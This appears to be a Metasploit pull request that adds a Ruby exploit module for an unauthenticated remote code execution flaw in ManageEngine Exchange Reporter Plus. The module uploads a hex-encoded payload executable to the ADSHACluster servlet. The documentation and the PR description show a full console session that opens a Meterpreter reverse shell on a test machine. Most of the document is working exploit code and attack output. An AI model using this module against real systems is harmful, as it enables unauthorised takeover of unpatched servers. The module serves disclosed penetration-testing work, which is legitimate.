### PR TITLE
Add ManageEngine Exchange Reporter Plus RCE module

### DIFF
--- a/modules/exploits/windows/http/manageengine_adshacluster_rce.md
+++ b/modules/exploits/windows/http/manageengine_adshacluster_rce.md
@@ -1,0 +1,54 @@
+## Description
+This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet.
+Additional information can be viewed on https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html
+
+## Vulnerable Application 
+[Exchange Reporter Plus 5216](https://mega.nz/#!XG5CTC5I!IuG91CbrcdcpQj4teYRiBWNwy9pULRkV69U3DQ6nCyU)
+
+## Verification Steps
+
+ 1. Install the application
+ 2. Start msfconsole
+ 3. Do: `use exploit/windows/http/manageengine_adshacluster_rce`
+ 4. Do: `set rhost <ip>`
+ 5. Do: `check`
+```
+[*] Version: 5216
+[+] 192.168.88.125:8181 The target is vulnerable.
+```
+ 6. Do: `set lport <port>`
+ 7. Do: `set lhost <ip>`
+ 8. Do: `exploit`
+ 9. You should get a shell.
+
+
+## Scenarios
+
+### Exchange Reporter Plus 5216 on Windows Target
+```                                                                                                                                    
+msf > use exploit/windows/http/manageengine_adshacluster_rce
+msf exploit(windows/http/manageengine_adshacluster_rce) > set rhost 192.168.88.125
+rhost => 192.168.88.125
+msf exploit(windows/http/manageengine_adshacluster_rce) > check
+
+[*] Version: 5216
+[+] 192.168.88.125:8181 The target is vulnerable.
+msf exploit(windows/http/manageengine_adshacluster_rce) > set lport 1111
+lport => 1111
+msf exploit(windows/http/manageengine_adshacluster_rce) > set lhost 192.168.88.120
+lhost => 192.168.88.120
+msf exploit(windows/http/manageengine_adshacluster_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.88.120:1111
+[*] Sending stage (179779 bytes) to 192.168.88.125
+[*] Meterpreter session 2 opened (192.168.88.120:1111 -> 192.168.88.125:49955) at 2018-07-02 18:58:01 +0200
+
+meterpreter > sysinfo
+Computer        : WIN10
+OS              : Windows 10 (Build 16299).
+Architecture    : x64
+System Language : pl_PL
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+```

--- a/modules/exploits/windows/http/manageengine_adshacluster_rce.rb
+++ b/modules/exploits/windows/http/manageengine_adshacluster_rce.rb
@@ -1,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule  < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',
+      'Description'    => %q{
+        This module exploits a remote code execution vulnerability that
+        exists in Exchange Reporter Plus <= 5310, caused by execution of
+        bcp.exe file inside ADSHACluster servlet
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Kacper Szurek <kacperszurek@gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']
+        ],
+      'Platform'       => ['win'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        => [['Automatic', {}]],
+      'DisclosureDate' => 'Jun 28 2018',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),
+        Opt::RPORT(8181),
+      ])
+
+  end
+
+  def bin_to_hex(s)
+      s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/GetProductVersion')
+    })
+
+    if res && res.code == 200
+      begin
+        json = res.get_json_document
+      rescue JSON::ParserError => e
+        print_error("Failed: #{e.class} - #{e.message}")
+        return Exploit::CheckCode::Unknown
+      end
+
+      if json.empty? || !json['BUILD_NUMBER']
+        print_error("Wrong server response")
+        return Exploit::CheckCode::Unknown
+      end
+
+      print_status "Version: #{json['BUILD_NUMBER']}"
+
+      if json['BUILD_NUMBER'].to_i <= 5310
+        Exploit::CheckCode::Vulnerable
+      else
+        Exploit::CheckCode::Safe
+      end
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/ADSHACluster'),
+      'vars_post' => {
+        'MTCALL'  => "nativeClient",
+        'BCP_RLL' => "0102",
+        'BCP_EXE' => bin_to_hex(generate_payload_exe)
+      }
+    })
+  end
+end

--- a/modules/exploits/windows/http/manageengine_adshacluster_rce.rb
+++ b/modules/exploits/windows/http/manageengine_adshacluster_rce.rb
@@ -46,39 +46,41 @@ class MetasploitModule  < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi({
-      'method'   => 'POST',
-      'uri'      => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/GetProductVersion')
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
     })
 
-    if res && res.code == 200
-      begin
-        json = res.get_json_document
-      rescue JSON::ParserError => e
-        print_error("Failed: #{e.class} - #{e.message}")
-        return Exploit::CheckCode::Unknown
-      end
-
-      if json.empty? || !json['BUILD_NUMBER']
-        print_error("Wrong server response")
-        return Exploit::CheckCode::Unknown
-      end
-
-      print_status "Version: #{json['BUILD_NUMBER']}"
-
-      if json['BUILD_NUMBER'].to_i <= 5310
-        Exploit::CheckCode::Vulnerable
-      else
-        Exploit::CheckCode::Safe
-      end
-    else
-      Exploit::CheckCode::Unknown
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Safe
     end
+
+    unless res.code == 200
+      vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
+      return CheckCode::Safe
+    end
+
+    begin
+      json = res.get_json_document
+      raise if json.empty? || !json['BUILD_NUMBER']
+    rescue
+      vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
+      return CheckCode::Safe
+    end
+
+    vprint_status "Version: #{json['BUILD_NUMBER']}"
+
+    if json['BUILD_NUMBER'].to_i <= 5310
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
   end
 
   def exploit
     res = send_request_cgi({
       'method'    => 'POST',
-      'uri'       => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/ADSHACluster'),
+      'uri'       => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
       'vars_post' => {
         'MTCALL'  => "nativeClient",
         'BCP_RLL' => "0102",


### PR DESCRIPTION
## Description
This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet.
Additional information can be viewed on https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html

## Vulnerable Application 
[Exchange Reporter Plus 5216](https://mega.nz/#!XG5CTC5I!IuG91CbrcdcpQj4teYRiBWNwy9pULRkV69U3DQ6nCyU)

## Verification

- [x] Install the application
- [x]  Start msfconsole
- [x]  Do: `use exploit/windows/http/manageengine_adshacluster_rce`
- [x]  Do: `set rhost <ip>`
- [x]  Do: `check`
- [x]  Do: `set lport <port>`
- [x]  Do: `set lhost <ip>`
- [x]  Do: `exploit`
- [x]  You should get a shell.


## Scenarios

### Exchange Reporter Plus 5216 on Windows Target
```                                                                                                                                    
msf > use exploit/windows/http/manageengine_adshacluster_rce
msf exploit(windows/http/manageengine_adshacluster_rce) > set rhost 192.168.88.125
rhost => 192.168.88.125
msf exploit(windows/http/manageengine_adshacluster_rce) > check

[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
msf exploit(windows/http/manageengine_adshacluster_rce) > set lport 1111
lport => 1111
msf exploit(windows/http/manageengine_adshacluster_rce) > set lhost 192.168.88.120
lhost => 192.168.88.120
msf exploit(windows/http/manageengine_adshacluster_rce) > exploit

[*] Started reverse TCP handler on 192.168.88.120:1111
[*] Sending stage (179779 bytes) to 192.168.88.125
[*] Meterpreter session 2 opened (192.168.88.120:1111 -> 192.168.88.125:49955) at 2018-07-02 18:58:01 +0200

meterpreter > sysinfo
Computer        : WIN10
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : pl_PL
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```

I don't check `res` output inside `exploit` function because `ADSHACluster` waits until payload exit (so in normal situation when meterpreter is used, this call will timeout).